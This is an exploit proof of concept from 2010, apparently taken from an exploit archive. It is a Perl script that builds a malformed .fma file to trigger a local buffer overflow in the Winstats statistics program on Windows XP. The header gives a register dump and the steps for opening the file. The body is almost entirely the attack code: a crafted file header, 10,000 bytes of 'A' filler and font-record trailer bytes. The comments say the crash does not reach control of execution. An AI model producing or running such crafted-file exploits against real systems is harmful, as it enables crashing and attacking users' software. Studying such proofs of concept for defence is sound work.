# Title : Winstats (.fma) Local Buffer Overflow PoC
# Published : 2010-06-24
# Author : MadjiX
###################################################################
#Exploit Title : Winstats (.fma) local Buffer Overflow PoC
#Tested on: Windows XP SP3 (FR)
#Author: MadjiX
#Special Greets:His0k4 [ where are you :( ]
#Greets:Bibi-info , Silectovic , Volc4n0
#App: http://math.exeter.edu/rparris/peanut/wsfr32z.exe
###################################################################
#-->Fenêtre-->1variable-->Fichier-->Ouvrir--> Open madjix.fma file
#Note: open the file twice, I don't know why
#EAX 0000060E
#ECX 00000000
#EDX 00D66898
#EBX 616D662E
#ESP 0012F74C
#EBP 0012F750
#ESI 00AD7AE0
#EDI 41414141
#EIP 00432675 wstatfr.00432675
#C 0 ES 0023 32bit 0(FFFFFFFF)
#P 1 CS 001B 32bit 0(FFFFFFFF)
#A 0 SS 0023 32bit 0(FFFFFFFF)
#Z 0 DS 0023 32bit 0(FFFFFFFF)
#S 0 FS 003B 32bit 7FFDF000(FFF)
#T 0 GS 0000 NULL
###################################################################
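use strict;
use warnings;

# Path of the crafted .fma file written by this script.
my $file = "MadjiX.fma";

# Header of the .fma file. Every byte is written as a "\xNN" escape so
# that Perl emits one raw byte per escape; the rendered page had lost the
# backslashes ("xB9x01..."), which would have produced the three literal
# characters 'x','B','9' per byte and a file the application cannot parse.
my $hd = "\xB9\x01\x00\x00\x09\x00\x00\x00".
"\x50\x00\x00\x00\x5D\x00\x00\x00".
"\x00\x02\x00\x00\x00\x02\x00\x00".
"\x00\x00\x00\x00\x01\x00\x00\x00".
"\x3D\x00\x00\x00\xD9\xFF\xFF\xFF".
"\x2C\x01\x00\x00\x64\x00\x00\x00".
"\x64\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x0A";

# Trailer of the .fma file (font records follow the overflowing field).
my $ft = "\x0A\x00\x00\x00\x0A\x00\x00\x00\x0A\x00".
"\x00\x00\x0C\x00\x00\x00\xF0\xFF\xFF\xFF".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x90\x01\x00\x00\x00\x00\x00\x00".
"\x08\x02\x01\x31\x43\x6F\x75\x72\x69\x65".
"\x20\x4E\x65\x77\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\xF3\xFF\xFF\xFF\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x90\x01\x00\x00\x00\x00\x00\x02\x08".
"\x02\x01\x31\x53\x79\x6D\x62\x6F\x6C\x00".
"\x20\x4E\x65\x77\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\xF3\xFF\xFF\xFF\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x90\x01\x00\x00\x00\x00\x00\x00\x08".
"\x02\x01\x31\x43\x6F\x75\x72\x69\x65\x72".
"\x20\x4E\x65\x77\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\xF5\xFF\xFF\xFF\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x90\x01\x00\x00\x00\x00\x00\x00\x08".
"\x02\x01\x31\x43\x6F\x75\x72\x69\x65\x72".
"\x20\x4E\x65\x77\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\xF0\xFF\xFF\xFF\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x90\x01\x00\x00\x00\x00\x00\x00\x08".
"\x02\x01\x02\x54\x69\x6D\x65\x73\x00\x72".
"\x20\x4E\x65\x77\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\xF5\xFF\xFF\xFF\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x90\x01\x00\x00\x00\x00\x00\x00\x08".
"\x02\x01\x31\x43\x6F\x75\x72\x69\x65\x72".
"\x20\x4E\x65\x77\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\xF3\xFF\xFF\xFF\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x90\x01\x00\x00\x00\x00\x00\x00\x08".
"\x02\x01\x31\x43\x6F\x75\x72\x69\x65\x72".
"\x20\x4E\x65\x77\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\xF3\xFF\xFF\xFF\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x09\x00\x10\x00\x00\x00\x00\x00\x00".
"\x80\x20\x13\x14\x36\xF7\x57\x26\x96\x57".
"\x22\x04\xE6\x57\x70\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00";

# Oversized filler between header and trailer. The register dump in the
# header shows EDI = 41414141, i.e. this filler is what reaches the
# overflowed field; EIP there is still inside wstatfr, so the dump only
# evidences a crash, not control of execution.
my $junk = "\x41" x 10000;

# Three-arg open with an explicit failure check, instead of the unchecked
# two-arg form; ':raw' keeps the payload byte-exact on Windows, where a
# text-mode handle would rewrite the \x0A bytes as \x0D\x0A and corrupt the
# file layout. Buffered write errors surface at close, so that is checked too.
open my $fh, '>:raw', $file or die "open $file: $!";
print {$fh} $hd, $junk, $ft or die "write $file: $!";
close $fh or die "close $file: $!";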